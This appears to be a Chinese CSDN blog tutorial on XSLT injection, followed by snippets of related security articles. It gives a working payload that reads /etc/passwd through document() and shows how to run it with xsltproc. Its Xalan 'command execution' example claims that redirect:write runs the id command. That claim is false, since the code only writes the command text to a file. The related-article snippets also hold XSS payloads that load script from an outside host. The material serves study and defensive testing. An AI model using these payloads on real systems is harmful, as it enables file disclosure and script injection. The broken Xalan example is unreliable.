xslt注入

最新推荐文章于 2024-08-16 21:21:47 发布
最新推荐文章于 2024-08-16 21:21:47 发布
阅读量914 收藏 7
点赞数 13
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85480529/article/details/140208589
版权

XSLT注入是一种Web应用程序安全漏洞,类似于SQL注入。这种攻击利用应用程序中对用户输入缺乏适当的验证和转义,将恶意XSLT代码注入到应用程序中,导致执行未授权的代码或访问敏感数据。以下是XSLT注入可能导致的一些安全问题:

  1. 任意代码执行:攻击者可以注入并执行任意的XSLT代码,包括XSLT 1.0和2.0的扩展功能。如果XSLT处理器允许执行外部函数或扩展,攻击者可能会执行系统命令或脚本。

  2. 信息泄露:攻击者可以通过XSLT注入访问和读取原本不可见的数据。使用XSLT函数(如document()函数),可以从服务器上读取其他文件或从其他资源获取数据。

  3. 拒绝服务(DoS):恶意的XSLT代码可能包含无限循环或递归,导致服务器资源耗尽,从而使应用程序无法响应正常请求。

  4. 服务器端请求伪造(SSRF):XSLT处理器可以通过document()函数访问外部资源。攻击者可能利用这一点来访问受限的内部资源或向外部服务器发送请求。

XSLT注入攻击的具体实现依赖于目标系统的配置和使用的XSLT处理器功能。为了学习目的,以下是一个简单的XSLT注入示例,这个示例假设目标系统允许使用document()函数访问外部资源。

假设目标XML文档是:

<root>
  <data>Some data</data>
</root>

恶意的XSLT样式表(Payload)可以是:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

  <!-- 读取文件系统上的敏感文件 -->
  <xsl:template match="/">
    <xsl:variable name="file" select="document('file:///etc/passwd')" />
    <xsl:copy-of select="$file" />
  </xsl:template>

</xsl:stylesheet>

解释

  1. <xsl:variable name="file" select="document('file:///etc/passwd')"/>
    • 使用document()函数读取文件系统上的/etc/passwd文件(假设目标系统是类Unix系统)。
  2. <xsl:copy-of select="$file"/>
    • 输出读取的文件内容。

实验环境设置

为了在受控环境中进行测试和学习,您可以使用以下步骤:

  1. 创建XML文档:保存上面的XML文档内容到input.xml文件。
  2. 创建XSLT样式表:保存恶意XSLT内容到payload.xsl文件。
  3. 执行转换:使用命令行工具(如xsltproc)或编程语言(如Python)执行XSLT转换。
xsltproc payload.xsl input.xml

要在XSLT注入中执行系统命令(如id命令),需要利用XSLT处理器的扩展功能,因为标准的XSLT 1.0和2.0规范不支持直接执行系统命令。不过,一些XSLT处理器(如Saxon和Xalan)支持扩展函数或允许调用外部脚本,这可能会导致任意代码执行。

以下是一个使用Xalan处理器的示例,展示了如何通过XSLT注入执行id命令:

示例XML文档

<root>
  <data>Some data</data>
</root>

恶意XSLT样式表

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:redirect="http://xml.apache.org/xalan/redirect">
    
    <!-- 使用Xalan扩展函数执行系统命令 -->
    <xsl:template match="/">
        <xsl:variable name="cmd" select="'id > /tmp/xslt_injection_output.txt'" />
        <xsl:value-of select="redirect:write('file:///dev/null', $cmd)" />
    </xsl:template>
    
</xsl:stylesheet>

解释

  1. xmlns:redirect="http://xml.apache.org/xalan/redirect":声明Xalan的重定向扩展命名空间。
  2. <xsl:variable name="cmd" select="'id > /tmp/xslt_injection_output.txt'" />:定义一个变量cmd,其中包含要执行的系统命令id,并将输出重定向到/tmp/xslt_injection_output.txt文件。
  3. <xsl:value-of select="redirect:write('file:///dev/null', $cmd)" />:利用Xalan的重定向功能执行命令,将结果写入指定文件。

执行转换

在受控环境中,使用Xalan处理器执行转换:

java org.apache.xalan.xslt.Process -IN input.xml -XSL payload.xsl -OUT output.xml

查看结果

执行命令后,您可以查看输出文件/tmp/xslt_injection_output.txt中的结果:

cat /tmp/xslt_injection_output.txt

安全提示

这种方法利用了特定XSLT处理器的扩展功能,因此在不同的处理器上可能需要不同的实现方式。请务必在安全、受控的环境中进行测试,并且不要在未经授权的系统上使用此类攻击。防止XSLT注入的最佳实践包括验证和清理用户输入,禁用不必要的功能,使用最小权限原则,以及选择安全的处理器库。

2401_85480529
关注
Java代码审计中常见的漏洞(二)
武天旭的博客
12-09 2200
经过漫长时间的迭代更新,内容从一开始的碎片化网罗搜集,到排版与整合划分,再到学习与实践验证,最后摒弃初始,用自己的语言与实践结论通俗的将它展现出来。强化知识技能的同时也为读者带来更好的阅读体验。 本篇介绍了以下代码安全问题: 编号 漏洞 1 文件数据泄露 2 密码正确性验证 3 SMTP响应截断 4 XSLT注入 5 XML外部实体注入 6 敏感信息泄露 7 XML实体扩展注入
【漏洞挖掘】——21、RPO漏洞挖掘攻防
Fly_鹏程万里
03-03 3237
Gareth Heyes在2014年首次提出了一种新型攻击手法—RPO(Relative Path Overwrite)相对路径覆盖,该漏洞是一种利用相对URL路径覆盖目标文件的一种攻击手段,其主要依赖于服务器和浏览器的解析差异性并利用前端代码中加载的css/js的相对路径来加载其他文件,最终使得浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。
渗透测试-XLST
cdyunaq的博客
05-09 2321
- XSLT简介 - XSL(可扩展样式表语言)是一种用于转换XML文档的语言,XSLT表示的就是XSL转换,转换后得到的一般都是不同的XML文档或其他类型文档,例如HTML文档、CSV文件以及明文文本文件等等。 一般来说,应用程序或模板引擎在处理不同文件类型时需要使用XSLT来进行数据转换。很多企业级应用比较喜欢使用XSLT,比如说,多用户发票应用程序可以使用XSLT来允许客户自定义它们的发票,客户可以根据自己的需求来修改发票信息以及格式。 其他常见应用: •报告功能 •多种格式的数据导出功能;
应用安全系列之十五:XSLT注入
jimmyleeee的专栏
03-11 2216
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
XSLT 实例
天元喜羊羊的博客
04-11 807
实例1: cdcatalog.xsl:
XSLT
反手一个bug的博客
12-18 711
&amp;lt;xsl:template&amp;gt; 元素 &amp;lt;xsl:template&amp;gt; 元素用于构建模板。 match 属性用于关联 XML 元素和模板。match 属性也可用来为整个 XML 文档定义模板。match 属性的值是 XPath 表达式(举例,match=&quot;/&quot; 定义整个文档)。 注意:由于 XSL 样式表本身也是一个 XML 文档,因此它总是由 XML 声明起始:&amp;lt
商品注入签名:商品注入签名,恶意输入,XSS,HTTP标头注入,XXE,RCE,Javascript,XSLT
02-03
#XSS.Cx公共仓库 商品注射签名 自2015年以来就从互联网上删除,这并不是您应该使用的所有的抄袭。 建议使用: -Include with Burp Intruder or Custom Scripts -Manual Injection Testing with Well-Known ...
XSLT_payload
02-13
1. **注入攻击**:XSLT注入通常发生在应用程序接受用户输入并将其直接传递给XSLT处理器时。攻击者可以通过提交恶意XSLT代码来篡改XML数据的处理方式,可能导致数据泄露、拒绝服务或执行任意代码。 2. **XSLT处理器...
xslt-processor:不带本机库依赖项JavaScript XSLT处理器 开发技术 - 其它.zip
08-11
- **安全考虑**:处理XSLT时需要警惕XSLT注入攻击,确保输入的XSLT模板是安全的,或者对用户提供的模板进行适当的过滤和验证。 总之,`xslt-processor`是一个为JavaScript环境设计的无本机库依赖的XSLT处理器,它在...
XSLT模版注入漏洞
最新发布
l_l_c_q的博客
08-16 1101
XSLT模版注入
XSLT入门
Just Code
07-13 156
学习资源: 1. http://www.w3school.com.cn/xsl/ 2. https://www6.software.ibm.com/developerworks/cn/education/xml/x-introxslt/section2.html     1.XSLT的概念 我们首先来澄清一个概念,大家可能听说过XSL(eXtensible Stylesheet...
XSLT知识
菜鸟通往架构师之路
09-22 1130
ESB最常见的用途是将传入或者传出的消息从一种格式转换到另一种格式,在ESB中我们利用xslt文件实现。 1.什么是XSLT? 首先提到XSLT不得不提到XSL,XSL指扩展样式表语言(EXtensible Stylesheet Language). 在计算机科学中,XSLT是扩展样式表转换语言(ExtensibleStylesheetLanguage Transformations)的简称
利用XSLT继续击垮XML
weixin_34023982的博客
03-08 152
小飞 · 2016/02/23 11:260x00 介绍XSL首先我们要说的是,这个XSLT应该这么断句:XSL-T。XSL指的是EXtensible Stylesheet Language,中文被很直白地翻译成扩展样式表语言。这种语言和xml有莫大关系:XSL之于XML相当于CSS之于HTML。HTML的每个元素都是预定义好的,比如&lt;table&gt;用来定义表格,浏览器也知道怎么识别这个...
三个安全漏洞: XSLT 样式表处理、Solaris 10 绑定、Sun Cluster Software 安全漏洞(eNew 第二十八期/2007.09)
枫梓的贝壳
09-29 619
XSLT样式表处理的安全漏洞会影响到Sun Java System Application Server 和 Web 服务器Sun Alert ID 102992: Sun Java System Application Server 和 Sun Java System Web Server的部分发行版没有安全地处理转换XML签名的XLST样式表,可能允许执行恶意的XSLT样式表。这个问题会影
Goby 漏洞发布|Splunk Enterprise XSLT 命令执行漏洞(CVE-2023-46214)
m0_46699477的博客
11-26 594
Splunk Enterprise 是美国 Splunk 公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据,包括所有IT系统和基础结构(物理、虚拟机和云)生成的数据。Splunk Enterprise 存在命令执行漏洞,该漏洞源于不会安全地清理用户提供的可扩展样式表语言转换 (XSLT),攻击者利用该漏洞可以上传恶意 XSLT,从而在 Splunk Enterprise 实例上远程执行命令。
Java CVE』CVE-2022-34169: Xalan-J XSLT整数截断漏洞PoC结构再浅析
Ho1aAs‘s Blog
09-24 2699
class文件常量池最大只有`0xFFFF`(65535),当写入常量数量n>0xFFFF时:正常写入常量池是`n & 0xFFFF`个,被截断,后续多余的将会溢出、覆盖正常class文件的内容,首当其冲的是`access_flag`参数。如果写入65536个常量,那么常量池表就为空(0x10000 & 0xFFFF = 0);如果写入65537个常量,此时常量表为1...以此类推,后面溢出的常量就覆盖了class文件。
xss跨站脚本***大全
weixin_34331102的博客
03-20 568
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
xss注入教程与总结
qq_39616910的博客
02-23 3457
xss注入总结 1 " < >可以用URL编码 %22 %3c %3e HTML 编码 &quot; &lt; &gt; 代替 2 如果过滤 可以用%2522 %26colon; 这种代替尝试 二次转码 3 如果输入框有历史记录 ,个人简介注意使用 发现很多网站对输入框有过滤缺但没有过滤历史记录这些的输出,输出的语句会运行 4 思路就是打破结构 不管是哪里的输入框 还要关注输出(历史记录,标题,评论,个人性息编辑的输出位置等)也可能触发 5 注意空格,减号,..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值